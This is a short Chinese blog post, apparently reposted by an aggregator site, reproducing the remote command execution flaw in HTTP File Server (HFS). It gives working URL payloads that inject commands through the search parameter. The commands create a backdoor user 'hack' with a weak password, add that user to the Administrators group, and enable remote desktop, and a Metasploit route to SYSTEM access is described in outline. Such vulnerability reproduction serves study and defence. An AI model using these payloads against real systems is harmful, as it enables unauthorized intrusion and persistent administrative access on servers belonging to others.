漏洞程序下載地址:Http File Server

這里說一下，在Windows server 2003中復現時，我直接使用Administrator用戶登錄，然后復現，未出現權限問題。再Windows 10中嘗試復現時發現權限不足，需要以管理員權限執行漏洞程序。

運行程序截圖如下

嘗試訪問該軟件提供的web服務

web服務是這個樣子的，這個web服務的搜索處存在漏洞

一、手工利用

payload如下

http://127.0.0.1/?search==%00{.exec|cmd /c 此處替換為dos命令.} http://127.0.0.1/?search==%00{.exec|cmd /c 此處替換為dos命令.}

• 1
• 2

完整利用過程如下
使用如下payload添加一個管理員賬戶

http://127.0.0.1/?search==%00{.exec|cmd /c net user hack 123 /add.}

• 1

添加用戶：hack
密碼：123

將用戶hack添加到Administrators組。

http://127.0.0.1/?search==%00{.exec|cmd /c net localgroup Administrators hack /add.}

• 1

開啟3389遠程端口

使用遠程連接工具連接，連接成功。

2、使用msf利用

啟動Metasploit，搜索hfs漏洞利用模塊

加載模塊，并設置目標IP

設置payload，以及本機IP

開始執行

成功獲得system權限

總結

以上是生活随笔為你收集整理的HFS远程命令执行漏洞复现的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。